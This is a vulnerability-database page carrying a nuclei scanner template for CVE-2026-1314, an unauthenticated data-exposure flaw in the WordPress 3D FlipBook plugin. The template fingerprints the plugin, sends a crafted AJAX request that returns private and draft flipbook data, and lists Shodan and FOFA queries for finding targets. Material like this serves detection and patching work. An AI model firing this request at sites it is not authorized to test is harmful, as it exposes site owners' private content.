Lucene search
K

WordPress 3D FlipBook <= 1.16.17 - Information Disclosure

🗓️ 07 Jul 2026 16:50:48Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 13 Views

WordPress 3D FlipBook <=1.16.17 leaks private flipbook metadata and PDFs via unauthenticated AJAX.

Related
Refs
Code
id: CVE-2026-1314

info:
  name: WordPress 3D FlipBook <= 1.16.17 - Information Disclosure
  author: theamanrawat
  severity: medium
  description: |
    WordPress 3D FlipBook - PDF Flipbook Viewer, Flipbook Image Gallery plugin versions <= 1.16.17 contain a missing authorization vulnerability in multiple AJAX endpoints. The fb3d_send_posts_in, fb3d_send_post_pages, fb3d_send_posts_in_pages, fb3d_send_posts_in_first_page, and fb3d_send_post_first_page handlers are registered with wp_ajax_nopriv hooks but fail to verify the post status of requested flipbook entries. This allows unauthenticated attackers to retrieve full metadata, PDF URLs, and configuration data of private, draft, and password-protected flipbook posts.
  impact: |
    Unauthenticated attackers can access sensitive flipbook metadata, potentially exposing confidential information.
  remediation:
    Upgrade the 3D FlipBook - PDF Flipbook Viewer, Flipbook Image Gallery plugin to version 1.16.18 or later.
  reference:
    - https://patchstack.com/database/wordpress/plugin/interactive-3d-flipbook-powered-physics-engine/vulnerability/wordpress-3d-flipbook-pdf-embedder-pdf-flipbook-viewer-flipbook-image-gallery-plugin-1-16-17-missing-authorization-to-unauthenticated-private-draft-flipbook-data-exposure-vulnerability
    - https://nvd.nist.gov/vuln/detail/CVE-2026-1314
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
    cvss-score: 5.3
    cwe-id: CWE-862
    cve-id: CVE-2026-1314
    epss-score: 0.00892
    epss-percentile: 0.55084
  metadata:
    verified: true
    max-request: 2
    vendor: iberezansky
    product: interactive_3d_flipbook
    framework: wordpress
    shodan-query: http.html:"/wp-content/plugins/interactive-3d-flipbook-powered-physics-engine/"
    fofa-query: body="/wp-content/plugins/interactive-3d-flipbook-powered-physics-engine/"
  tags: cve,cve2026,wordpress,wp-plugin,wp,3d-flipbook,exposure

flow: http(1) && http(2)

http:
  - raw:
      - |
        GET /wp-content/plugins/interactive-3d-flipbook-powered-physics-engine/readme.txt HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(body, "3D FlipBook")'
        condition: and
        internal: true

  - raw:
      - |
        GET /wp-admin/admin-ajax.php?action=fb3d_send_posts HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '"code":0'
          - '"title":'
          - '"post_type":"3d-flip-book"'
          - '"post_name":""'
        condition: and

      - type: word
        part: header
        words:
          - application/json

      - type: status
        status:
          - 200
# digest: 4b0a00483046022100b83eaf536ed58efbabdda4c61b33f9d9cbf5fce16cd6d476fc08efc2a6c6d126022100dbf3ec0211580ce16c491c9d1ae09c6d8488492f2b7fa957a8221e2a73925d69:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

15 Apr 2026 14:03Current
6Medium risk
Vulners AI Score6
CVSS 3.15.3
EPSS0.00892
SSVC
13